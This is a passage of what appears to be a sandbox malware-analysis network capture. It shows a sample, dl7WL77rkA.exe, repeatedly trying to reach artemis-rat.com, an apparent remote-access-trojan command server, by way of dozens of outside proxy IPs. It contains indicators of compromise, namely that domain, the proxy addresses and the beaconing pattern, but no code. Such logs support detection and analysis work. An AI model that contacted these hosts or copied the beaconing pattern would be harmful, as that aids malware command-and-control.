                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.443809986 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1807192.168.2.55489793.126.56.3041533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.095675945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1808192.168.2.55497579.110.202.13180813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.095897913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1809192.168.2.55494751.161.131.84199873876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.096323013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.905139923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.092859983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.405231953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.889492035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1810192.168.2.55494893.90.212.241533876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.096868992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1811192.168.2.555052104.25.115.125803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.097091913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.251909018 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1812192.168.2.55502931.220.56.210803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.097243071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.701997042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.309957027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.608400106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.108237028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.717600107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.217634916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.205281973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1813192.168.2.555067162.159.247.92803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.098290920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.260009050 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1814192.168.2.554833196.251.131.3880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.098952055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1815192.168.2.555066137.184.122.22380003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.099356890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1816192.168.2.554121189.240.60.16990903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.106005907 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.376574039 CET72INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1817192.168.2.553394162.241.46.40341723876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.109772921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1818192.168.2.55495338.54.116.981183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.131763935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.576684952 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1819192.168.2.55414215.235.187.227626403876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.152550936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.217612028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1820192.168.2.55337292.204.135.37325243876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.152659893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.217587948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.217856884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1821192.168.2.554946103.153.154.6803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.152755976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.590008020 CET343INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 182
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1822192.168.2.55077646.10.229.24380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.167511940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.217607021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.217936993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.282689095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1823192.168.2.55099650.63.12.3393673876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.169635057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.207628012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.389537096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1824192.168.2.555042147.75.92.251803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.175978899 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.451931953 CET65INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-Agent: Zscaler/6.3
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.545038939 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee 6c d5 f7 8a 70 b5 e0 de 01 bc 7a b8 ac 89 8d 87 cb fe d0 ba a3 bc 62 b7 89 1b bc 25 4f 0c 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: lhelpzb%O*,+0/$#('=<5/artemis-rat.com#xWT.ZPp&P\cR.g\w6gGV|r _w-N!ekkYS"


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1825192.168.2.55499295.217.155.11631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.176337004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.933475971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:05.427083969 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:06.455970049 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:09.656127930 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:15.802413940 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:27.832113981 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:53.432292938 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1826192.168.2.555120104.19.233.117803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.176419020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.331094027 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
